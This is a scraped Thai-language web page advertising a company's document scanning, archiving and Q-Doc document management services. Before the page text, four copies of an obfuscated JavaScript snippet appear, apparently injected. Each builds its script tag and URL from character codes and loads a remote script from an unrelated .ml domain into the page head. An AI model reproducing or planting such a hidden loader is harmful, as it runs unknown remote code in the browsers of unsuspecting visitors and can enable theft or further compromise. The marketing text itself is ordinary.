Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Scanning Service – alfresco

Scanning Service

บริการสแกนเอกสาร บริการจัดเก็บเอกสาร แบบครบวงจรทุกองค์กร และ สำนักงานทั่วประเทศ
Document Process Outsourcing Q-Doc Enterprise Content Management, Scan Station,Web-base Work Flow
โทร. 02-860-6659 ,082-645-4469

 

ทำไมต้องสแกนเอกสาร ?

ในแต่ละองค์กร มักมีเอกสารมากมายที่จำเป็นต่อการดำเนินกิจการ ทั้งเอกสารทางการเงิน เอกสารสำคัญ เอกสารลับ เอกสารทั่วไป

ซึ่งเอกสาร มักมีเพิ่มขึ้นในทุกๆวัน ยิ่งนานวันเอกสารยิ่งเยอะจนไม่มีพื้นที่จัดเก็บ ด้วยเหตุนี้ บริษัท เค แอนด์ โอฯ

จึงขอรับหน้าที่เพื่อแบ่งเบาภาระเรื่อง “การสแกนเอกสาร จัดเก็บเอกสาร” ขององค์กรและสำนักงานทั่วไทย

จวบจนถึงปัจจุบันนี้เป็นเวลากว่า 12 ปี ที่บริษัท เค แอนด์โอฯ ได้ให้บริการสแกนเอกสาร พร้อมทั้งการพัฒนาศักยภาพบุคลากรและเทคโนโลยี เพื่อให้การบริการมีคุณภาพที่ยอดเยี่ยม ซึ่งเป็นเหตุผลที่ “ควรไว้ใจเราให้เราบริการสแกนเอกสารและจัดเก็บเอกสารให้ท่าน”

ประโยชน์ของการสแกนเอกสาร

1. เพื่อเพิ่มพื้นที่ว่างให้กับออฟฟิศ
2. ประหยัดเวลาในการจัดการเอกสาร
3. สามารถเข้าถึงเอกสารได้ทันที
4. ป้องกัน การสูญหายของข้อมูลจากภัยต่างๆ
5. สามารถแบ่งปันและทำงานร่วมกันได้อย่างง่ายดาย
6. ประหยัด สามารถควบคุมค่าใช้จ่ายได้
7. ลดค่าใช้จ่ายในการดูแลเอกสาร ระยะยาว

Scanning Service
บริการสแกนเอกสาร

​เรามีบริการสแกนเอกสารของท่านถึงสำนักงานโดยที่ท่านไม่ต้องเสียเวลาเดินทางขนย้ายเอกสารเอง ทำให้สะดวกและรวดเร็วยิ่งขึ้น

ในปัจจุบัน เรารับสแกนเอกสาร จำนวน 70 ล้านหน้า ต่อปี ให้กับ บริษัทองค์กรขนาดใหญ่ พร้อมระบบจัดการเอกสารที่มีประสิทธิภาพสูง เรามีบริการตั้งแต่ การรับเอกสาร Scan เอกสาร หรือ Document Conversion การส่งมอบเป็น PDF, USB Drive, DVD, XML, Word ทำดัชนีค้นหา พร้อมระบบการค้นหาอัจฉริยะ และการทำลายเอกสาร โดยท่านสามารถเลือกได้ 3 แบบดังนี้

1. ราคาต่อหน้าเอกสาร คือคิดตามจำนวนหน้าที่สแกนจริง

2. ราคาบุคลากร พร้อมอุปกรณ์การสแกนเอกสาร ครบเซ็ท เป็นรายเดือน

3. ราคาบุคลากร+สแกนเอกสาร ต่อที่นี่ง กรณีองค์กรท่านมีอุปกรณ์การสแกนอยู่แล้ว
โดยท่านสามารถเลือกสถานที่การสแกนเอกสารที่สะดวกและเหมาะสมได้

มีพนักงานดูแลเอกสารอย่างมีระบบและเป็นขั้นเป็นตอน

มั่นใจกับทีมงานสแกนเอกสารมืออาชีพที่มั่นใจได้ในความถูกต้องของข้อมูล เรามีระบบการสแกนเอกสารอย่างมีระบบและเป็นขั้นเป็นตอน เช่น การคัดแยกเอกสารแต่ละประเภท การจัดเรียงหน้าเอกสาร การติดบาร์โค๊ดบนเอกสาร การติดบาร์โค๊ดที่กล่องจัดเก็บ เป็นต้น ทำให้ง่ายต่อการค้นหาและเอกสารทุกแผ่นได้ผ่านการตรวจสอบอย่างละเอียดโดยสามารถระบุตัวอักษร หรือตัวเลขเพื่อใช้ในการค้นหน้าเอกสารต่างๆได้

มีแวร์เฮ้าส์จัดเก็บเอกสารสำคัญที่ปลอดภัย

มีระบบรักษาความปลอดภัยของเอกสารต้นฉบับ และ เอกสารสำคัญให้อยู่ในสภาพที่สมบูรณ์ ไม่ให้ชำรุดหรือสูญหาย มีแบบสัญญารายปี เอกสารตรวจสอบได้ เพราะมีบาร์โค๊ดทุกกล่อง

การให้บริการสแกนเอกสารจะแบ่งเป็น 2 แบบ คือ

1. Onsite Service

บริษัทฯ จะจัดตั้งสถานที่ทำงาน และติดตั้งอุปกรณ์ที่จำเป็นในการทำงาน ณ. สำนักงานที่ลูกค้า ซึ่งจะต้องมีพื้นที่ในการทำงานเหมาะสมกับจำนวนเจ้าหน้าที่ และอุปกรณ์ที่ใช้ในการทำงาน โดยขนาดพื้นที่ในการทำงานจะขึ้นอยู่กับจำนวนเอกสารและจำนวนเจ้าหน้าที่ใช้ในแต่ละโครงการ และใช้สำหรับจัดเก็บเอกสาร จัดเตรียมเอกสาร สแกนเอกสาร และตรวจสอบเอกสารตามขั้นตอนต่าง ๆ

2. Offsite Service

สำหรับลูกค้่าที่ไม่มีพื้นที่เพียงพอให้ทางบริษัทฯ เข้าไปดำเนินงาน เรามีศูนย์สแกนเอกสารที่ได้มาตรฐาน มีพื้นที่เพียงพอ พร้อมกับเจ้าหน้าที่มีความรู้ความสามารถและประสบการณ์ และเครื่องมือที่ได้มาตรฐาน รองรับเอกสารประเภทต่างๆ ทำให้งานของท่านเสร็จตามระยะเวลาที่กำหนดอย่างมีคุณภาพ พร้อมกับระบบรักษาความปลอดภัย ให้ท่านได้มั่นใจ และบริการรับ-ส่งเอกสารฟรี

เราตระหนักดีว่าความปลอดภัยข้อมูลของลูกค้าเป็นสิ่งสำคัญที่สุด จึงได้มีสัญญาว่าด้วยการไม่เปิดเผยข้อมูล (NON-DISCLOSURE AGREEMENT) ทั้งสองฝ่าย เพื่อให้ได้ความมั่นใจเรื่องความปลอดภัยของข้อมูลและเอกสาร จากลูกค้าที่ใช้บริการมากยิ่งขึ้น

 

ขั้นตอนการทำงานสแกนเอกสาร

 

Software Q-doc

ส่วนเรื่องการจัดเก็บเอกสาร เราใช้ซอฟต์แวร์ของ Q-Doc ในการบริหารจัดการเอกสารขององค์กรให้มีประสิทธิภาพสูงสุด ซึ่งสามารถสร้างความครบถ้วนสำหรับการจัดการด้านเอกสาร

 

ประวัติโดยย่อของ Q-Doc บริการสแกนเอกสารและจัดเก็บเอกสาร เพื่อองค์กร

 

​Q-Doc เป็นชื่อของระบบจัดการเอกสารชื่อดัง ประสิทธิภาพและความสามารถ เทียบเท่า Alfresco ทุกประการแต่ความสามารถของฟังก์ชั่นจะมีมากกว่า และทำได้หลากหลายกว่า

Q-Doc เป็นของ บริษัท เคแอนด์ โอ ซิสเต็มส์ แอนด์ คอนซัลติ้ง จำกัด โดย มีเว็บไซต์ที่เกี่ยวข้องคือ scanxpert.com ecm.in.th doc.in.th scanner-th.com

ซึ่งเป็นบริการสแกนเอกสารและจัดเก็บเอกสารเข้าระบบคอมพิวเตอร์และใช้ซอฟต์แวร์เพื่อจัดเก็บไฟล์เอกสารอิเล็กทรอนิกส์พร้อมควบคุมเอกสารให้เป็นหมวดหมู่เพื่อสะดวกต่อการค้นหา

รวมถึงการตั้งค่าของเอกสารให้เหมาะสมกับแต่ละแผนก พร้อมการตั้งค่าเพื่อจำกัดการเข้าใช้งานของแต่ละบุคคล ปัจจุบันเราให้บริการมากว่า 12 ปี มีลูกค้าบริษัทองค์กรชั้นนำมากมาย โดยมี

จุดมุ่งหมายของการให้บริการสแกนและจัดเก็บเอกสาร เพื่ออำนวยความสะดวกให้หลายหลายบริษัท องค์กร และ หน่วยงานราชการ ให้ลดการใช้กระดาษ ประหยัดงบองค์กร ประหยัดเวลาใน

การค้นหาเอกสาร โดยสแกนและจัดเก็บลงคอมพิวเตอร์ และระบบ Workflow ให้จัดการเรื่องเอกสารในเครือ ของค์กรต่างๆ ให้การจัดการง่ายขึ้น และสะดวกขึ้น เช่น เอกสารสำคัญเอกสาร

บัญชี เอกสารลับ เอกสารทางราชการ และเอกสารทุกชนิด “หมดปัญหาด้านเอกสารที่ยุ่งยากเสียที เพราะเราจะดูแลให้ท่านถึงที่สำนักงาน”

เพราะเราเข้าใจเรื่องเอกสารดีที่สุด โปรดไว้ใจให้เราได้บริการคุณ เลือก Q-Doc By K&O เพื่อการสร้างมูลค่าและความคล่องตัวให้ธุรกิจคุณ

 

ตัวอย่างหน้าตา Q-Doc

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *